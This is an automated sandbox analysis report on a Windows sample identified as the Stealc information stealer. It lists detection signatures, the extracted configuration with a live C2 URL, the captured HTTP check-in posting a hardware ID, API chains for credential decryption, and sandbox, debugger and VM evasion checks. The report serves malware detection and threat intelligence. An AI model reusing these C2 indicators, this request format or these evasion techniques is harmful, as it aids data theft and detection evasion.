
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520716
MD5: f413d695f62b9d29686880be5daedb80
SHA1: 5680fc5f5fd1689a5aa2d0682434b5c20f6784bc
SHA256: 5a8c2a4536f6c77609a753f916c001d169f7746b3cca7aee87ac4b0a2422ac03
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F413D695F62B9D29686880BE5DAEDB80)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6800 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6800 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.c30000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T19:04:09.324295+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.c30000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00C3C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00C39AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00C37240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C39B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00C39B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00C48EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00C438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C44910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00C3DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00C3E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00C44570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00C3ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C316D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F68A FindFirstFileA | 0_2_00C3F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00C43EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C3F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00C3BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C3DE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 31 46 44 32 38 45 30 30 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a
  Data Ascii:
    ------IEHCBAFIDAECBGCBFHJE
    Content-Disposition: form-data; name="hwid"

    671FD28E00C93740105281
    ------IEHCBAFIDAECBGCBFHJE
    Content-Disposition: form-data; name="build"

    save
    ------IEHCBAFIDAECBGCBFHJE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C34880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00C34880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 31 46 44 32 38 45 30 30 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a
  Data Ascii:
    ------IEHCBAFIDAECBGCBFHJE
    Content-Disposition: form-data; name="hwid"

    671FD28E00C93740105281
    ------IEHCBAFIDAECBGCBFHJE
    Content-Disposition: form-data; name="build"

    save
    ------IEHCBAFIDAECBGCBFHJE--
Source: file.exe, 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2133666234.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2133666234.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
Source: file.exe, 00000000.00000002.2133666234.0000000001A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpXN
Source: file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 | 0_2_01005984
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9E036 | 0_2_00E9E036
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECA1FD | 0_2_00ECA1FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9993 | 0_2_00FF9993
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA4987 | 0_2_00EA4987
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010188A1 | 0_2_010188A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F67AEB | 0_2_00F67AEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007B4C | 0_2_01007B4C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100C25F | 0_2_0100C25F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFEB58 | 0_2_00FFEB58
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB5B2E | 0_2_00FB5B2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010022D6 | 0_2_010022D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100DD3D | 0_2_0100DD3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01008D48 | 0_2_01008D48
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD5FE | 0_2_00EFD5FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01000744 | 0_2_01000744
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F91E78 | 0_2_00F91E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100F782 | 0_2_0100F782
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFC63F | 0_2_00FFC63F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100A7D2 | 0_2_0100A7D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFCFF0 | 0_2_00FFCFF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01120648 | 0_2_01120648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01003EBF | 0_2_01003EBF
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00C345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: cgvssnvn ZLIB complexity 0.9948659202904002
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00C48680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00C43720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WTS7MIR6.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1858048 > 1048576
Source: file.exe | Static PE information: Raw size of cgvssnvn is bigger than: 0x100000 < 0x19f600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.c30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cgvssnvn:EW;oemmexyc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cgvssnvn:EW;oemmexyc:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00C49860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cfe90 should be: 0x1d131c
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: cgvssnvn
Source: file.exe | Static PE information: section name: oemmexyc
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010CE100 push edi; mov dword ptr [esp], eax | 0_2_010CE104
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0109A143 push 67B32BF8h; mov dword ptr [esp], edi | 0_2_0109A15E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010AE144 push edi; mov dword ptr [esp], 0D6F5201h | 0_2_010AE148
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ecx; mov dword ptr [esp], eax | 0_2_01005989
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push edi; mov dword ptr [esp], ebx | 0_2_010059D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push edx; mov dword ptr [esp], 7CF6357Ch | 0_2_01005A34
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 1A0C36FAh; mov dword ptr [esp], esi | 0_2_01005A8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 3C81E910h; mov dword ptr [esp], ebp | 0_2_01005AF1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 5655675Bh; mov dword ptr [esp], edx | 0_2_01005B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push eax; mov dword ptr [esp], ebx | 0_2_01005B76
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 36F8C9A1h; mov dword ptr [esp], esi | 0_2_01005B7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 4312908Ch; mov dword ptr [esp], eax | 0_2_01005BB7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ecx; mov dword ptr [esp], esp | 0_2_01005C5B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ebx; mov dword ptr [esp], ebp | 0_2_01005C74
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push esi; mov dword ptr [esp], edi | 0_2_01005C80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push edi; mov dword ptr [esp], 00000004h | 0_2_01005C84
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ebx; mov dword ptr [esp], esi | 0_2_01005CEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push edx; mov dword ptr [esp], 1F776BF6h | 0_2_01005CF3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 676C4EFEh; mov dword ptr [esp], edx | 0_2_01005D2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 72095A22h; mov dword ptr [esp], edx | 0_2_01005D3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ecx; mov dword ptr [esp], edi | 0_2_01005D67
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push edi; mov dword ptr [esp], esp | 0_2_01005D6B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 14A2C230h; mov dword ptr [esp], edx | 0_2_01005D7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 3809FB90h; mov dword ptr [esp], edi | 0_2_01005E2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ebx; mov dword ptr [esp], 614D0897h | 0_2_01005E35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push esi; mov dword ptr [esp], 369E8595h | 0_2_01005E46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push edx; mov dword ptr [esp], ecx | 0_2_01005F1C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 36BA9B59h; mov dword ptr [esp], ebp | 0_2_01005F24
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push ebx; mov dword ptr [esp], 350E85B7h | 0_2_01005F5B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 5D3F73C2h; mov dword ptr [esp], edx | 0_2_01006005
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01005984 push 0C91E582h; mov dword ptr [esp], ebp | 0_2_01006081
Source: file.exe | Static PE information: section name: cgvssnvn entropy: 7.9531873822886014

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00C49860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13482
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10144B1, second address: 10144C5, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edi; 0x00000005 popad; 0x00000006 je 00007F0C5CC49424h; 0x0000000c push eax; 0x0000000d push edx; 0x0000000e jne 00007F0C5CC49416h; 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1013448, second address: 101344D, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 push eax; 0x00000004 push edx; 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1003983, second address: 1003987, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1013C71, second address: 1013CA5, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 js 00007F0C5CE44006h; 0x0000000a pop edi; 0x0000000b pushad; 0x0000000c push edi; 0x0000000d pop edi; 0x0000000e jp 00007F0C5CE44006h; 0x00000014 pushad; 0x00000015 popad; 0x00000016 popad; 0x00000017 jmp 00007F0C5CE44017h; 0x0000001c popad; 0x0000001d push eax; 0x0000001e push edx; 0x0000001f push ecx; 0x00000020 push eax; 0x00000021 push edx; 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1013CA5, second address: 1013CAC, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pushad; 0x00000005 popad; 0x00000006 pop ecx; 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1013CAC, second address: 1013CB3, instructions: 0x00000000 rdtsc; 0x00000002 push esi; 0x00000003 push edx; 0x00000004 pop edx; 0x00000005 push eax; 0x00000006 push edx; 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1016405, second address: 1016409, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1016409, second address: 101642A, instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007F0C5CE44019h; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 push eax; 0x0000000a push edx; 0x0000000b push eax; 0x0000000c push edx; 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 101642A, second address: 101642E, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
